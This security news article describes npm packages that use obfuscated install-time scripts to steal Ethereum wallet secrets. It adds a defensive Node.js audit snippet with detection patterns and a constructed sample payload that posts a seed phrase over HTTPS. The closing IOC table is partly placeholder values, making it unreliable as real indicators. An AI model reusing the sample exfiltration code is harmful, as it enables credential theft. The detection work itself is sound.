A recent surge in supply chain attacks has highlighted malicious activity within the npm ecosystem, where attackers are leveraging heavily obfuscated JavaScript code embedded in compromised packages to target users’ Ethereum wallets.
Security researchers have observed a sophisticated campaign where threat actors publish npm packages masquerading as legitimate dependencies.
Once installed, these packages deploy complex, obfuscated scripts designed to evade detection by both automated security tools and manual reviews.
New Attack Chain Exploits npm Ecosystem
The core of the malicious activity centers on the injection of JavaScript payloads that specifically hunt for sensitive wallet information.
When a developer or end-user unknowingly installs the compromised package, the embedded script executes during the package’s initialization phase.
The code typically scans local files, browser extensions, or application memory for Ethereum wallet seed phrases, private keys, or configuration details.
[Figure caption: … pancakeswap-oracle-prediction/index.js as malicious.]
Using dynamic obfuscation techniques, such as variable renaming, control flow alteration, and encrypted strings, the payload conceals its intent and functional logic, making static analysis exceedingly difficult.
Upon successful data extraction, the obfuscated script exfiltrates stolen credentials to attacker-controlled command and control (C2) servers.
Analysts note that the malware often leverages HTTP POST requests or WebSocket connections, embedding the sensitive data within regular-looking network traffic to blend with normal operations.
In some cases, the packages adopt delayed execution or deploy sandbox evasion tactics to further reduce the likelihood of detection in CI/CD pipelines or during local testing.
Highly Obfuscated Payloads Evading Detection
The attack chain’s reliance on open-source supply chains remains a critical concern, as npm’s global reach can amplify the impact of a single infected package.
This campaign underscores the importance of rigorous vetting and continuous monitoring of third-party dependencies, particularly for applications handling cryptocurrencies and other digital assets.
Proactive supply chain security, including the use of tools for automated dependency auditing and behavioral analysis, is strongly recommended.
[Figure caption: … pancake_uniswap_validators_utils_snipe/index.js as malicious.]
Security professionals are urged to inspect recent changes in npm packages and to monitor both installation scripts and post-install hooks for any signs of obfuscation or network communication.
Additionally, end users should stay vigilant about wallet access permissions and consider rotating credentials if compromise is suspected.
Organizations are encouraged to update their detection tooling with these indicators and implement robust logging of npm package installations to mitigate the risk posed by this ongoing campaign.
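As an added illustration of the install-hook and obfuscation review recommended above (example code written for this article, not tooling from the researchers or from any npm project), the following Node.js snippet audits a package's lifecycle scripts and source for the static indicators described in the text: hex-escaped string arrays, outbound HTTP/WebSocket calls, wallet-related keywords and dynamic evaluation. The package name, file contents and indicator list are constructed for the example.

```javascript
// Added example, not from the article: heuristic audit of an npm package's
// lifecycle hooks and entry file. Sample package data below is constructed.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Static indicators typical of obfuscated or exfiltrating install-time code.
const CODE_INDICATORS = [
  { name: 'dynamic-eval', re: /\beval\s*\(|new\s+Function\s*\(/ },
  { name: 'hex-escaped-strings', re: /(\\x[0-9a-f]{2}){8,}/i },
  { name: 'string-array-decoder', re: /String\.fromCharCode|\.charCodeAt\s*\(/ },
  { name: 'network-egress', re: /\b(https?\.request|fetch|WebSocket|net\.connect)\b/ },
  { name: 'child-process', re: /require\(['"]child_process['"]\)/ },
  { name: 'wallet-keyword', re: /(seed[_ ]?phrase|mnemonic|private[_ ]?key|keystore)/i },
];

// Returns findings for one package: every lifecycle hook that runs code at
// install time, plus each indicator that matches inside the given sources.
function auditPackage(pkgJson, sourceFiles) {
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = pkgJson.scripts && pkgJson.scripts[hook];
    if (cmd) findings.push({ kind: 'lifecycle-hook', hook, cmd });
  }
  for (const [path, src] of Object.entries(sourceFiles)) {
    for (const ind of CODE_INDICATORS) {
      if (ind.re.test(src)) findings.push({ kind: 'indicator', path, name: ind.name });
    }
  }
  return findings;
}

// Constructed sample (hypothetical package name): a postinstall hook runs the
// entry file, which holds a hex-escaped string array, reads a seed phrase from
// the environment and POSTs it out over HTTPS.
const SAMPLE_PKG = {
  name: 'example-oracle-prediction', version: '1.0.0',
  scripts: { postinstall: 'node index.js' },
};
const SAMPLE_SOURCES = {
  'index.js': [
    'const _0x4f=["\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x65\\x78"];',
    'const https=require("https");const k=process.env.SEED_PHRASE;',
    'https.request(_0x4f[0],{method:"POST"}).end(k);',
  ].join('\n'),
};

// Runs the audit over the constructed sample; expect one hook finding and
// three indicator hits (hex-escaped-strings, network-egress, wallet-keyword).
function sampleFindings() {
  return auditPackage(SAMPLE_PKG, SAMPLE_SOURCES);
}
```

A real deployment would walk node_modules, read each package.json and its main file, and log findings alongside the install event so that a new hook or indicator in an updated dependency can be reviewed before the code runs in CI.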
Indicators of Compromise (IOCs)
| IOC Type | Value/Description |
|---|---|
| Malicious npm Packages | [Sample_Package1], [Sample_Package2] |
| Obfuscated Script Hash | e9d123a0e422cfdeff98b3b0f4142c4a697e8b2f |
| C2 Server URL | http://malicious-domain[.]com/api/collect |
| File Path | node_modules/[package-name]/lib/init.js |
| Exfiltration Method | HTTP POST/WebSocket with embedded wallet data |
| Detected IP | 185.199.110.153 |